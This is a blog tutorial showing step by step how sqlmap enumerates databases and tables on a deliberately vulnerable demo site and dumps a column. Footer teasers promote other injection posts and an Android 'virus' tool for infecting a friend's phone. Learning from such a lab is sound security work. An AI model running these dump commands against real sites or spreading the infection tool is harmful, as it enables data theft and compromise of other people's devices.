How to use SQLMAP to test a website for SQL Injection vulnerability with example.

-

 

How to use SQLMAP to test a website for SQL Injection vulnerability with example.

In this article I am explains how to test whether a website is safe from SQL injection using the SQLMAP penetration testing tool.

 What is SQL Injection?

SQL Injection is a code injection technique where an attacker executes malicious SQL queries that control a web application’s database. With the right set of queries, a user can gain access to information stored in databases. SQLMAP tests whether a ‘GET’ parameter is vulnerable to SQL Injection.

 Where can you use SQLMAP?

If you observe a web url that is of the form http://testphp.vulnweb.com/listproducts.php?cat=1, where the ‘GET’ parameter is in bold, then the website may be vulnerable to this mode of SQL injection, and an attacker may be able to gain access to information in the database. Furthermore, SQLMAP works when it is php based.

A simple test to check whether your website is vulnerable would to be to replace the value in the get request parameter with an asterisk (‘).

Installing sqlmap

SQLMAP comes pre – installed with kali linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command

sudo apt-get install sqlmap

Usage

In this article, we will make use of a website that is designed with vulnerabilities for demonstration purposes:

     http://testphp.vulnweb.com/listproducts.php?cat=1 

As you can see, there is a GET request parameter (cat = 1) that can be changed by the user by modifying the value of cat. So this website might be vulnerable to SQL injection of this kind.

       sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs --batch



Here two database we get  

* ] acurat

* ] information_schema

lets get further testing............

    To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can access the tables. For this, we use the –tables query. Let us access the acuart database.

    sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables --batch



 

    If we want to view the columns of a particular table, we can use the following command, in which we use -T to specify the table name, and –columns to query the column names. We will try to access the table ‘artists’.

     sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists  --columns --batch



Now our last command to Dump the data from the columns

    Similarly, we can access the information in a specific column by using the following command, where -C can be used to specify multiple column name separated by a comma, and the –dump query retrieves the data

     sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

-D acuart -T artists -C aname --dump --batch



 Note:

It's tutorial is only for educational purpose  Do not use it for illegal activities.

Comments

Post a Comment

Popular posts from this blog

JavaScript Object Notation (JSON) Injection

-
Image
Overview JSON injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response. In other words, the attacker can send input which later is incorporated into the JSON response. Discovery Methodology JSON injection starts like any injection; find the possible input parameters including adding custom parameters (parameter addition attack) to see if the application will process them and place those inputs into the JSON returned by the server. (If we cannot get our input into the JSON returned by the server, we cannot inject the JSON.) Finding input parameters can be done using an ordinary Firefox browser. No special tools are required. This particular page has a drop down which is an input. Developers sometimes think that they control the web page. This of course is incorrect. The web page is running in the users browser. The user can do anything they want like change the page using Firebug. If you dont like that drop-down...
Read more

Hack Android with Infect Virus Installation and Usees

-
Image
HACK ANDROID WITH INFECT TERMUX HACKING TOOL Android devices are popular in the world. Imagine how funny if you infect your friend’s device even if you don’t have hacking skills. Infect best Termux hacking tool will help us to do that. What is infect? Infect is a bash-based script that is officially made for Termux users and from this tool you can spread the android virus by just sending a link. Also, Infect is available on Termux, developers of this tool tested in on Termux. What are it’s features? Infect have some interesting features. Which are following:- [+] Dangerous virus tool! [+] Updated maintenance! [+] Easy for beginners! [+] Working virus tool for Termux! Installation process:- Now, before you install infect make sure you update and upgrade Termux. you can use these commands: $ apt-get update $ apt-get upgrade Then, after Termux finishes updating and upgrade, we move to the second step which is to install python. Do it only if you have not yet install python otherwise, you ...
Read more

Cascading Style Sheet (CSS) Injection

-
Image
  Overview Cascading style injection may occcur when user or attacker controlled input is later incorporated without being encoded into the web server response with a style attribute. In other words, the attacker can send input which later is incorporated into the web page the user receives. Discovery Methodology Inject all available parameters of the web page with a searchable string such as the word "CANARY" along with characters generally useful in writing HTML, JavaScript or other code. Search the response carefully noting any location where the test string appears unencoded in a style attribute. These locations may allow Cascading style injection. Hint: An example injection might be <CANARY={}""()'';#$--/>1. Adding a sequencial integer to the test input can help determine which of the inputs parameters resulted in the response string found. Exploitation Determine the prefix and suffix needed to make the injected code "fit" syntatically t...
Read more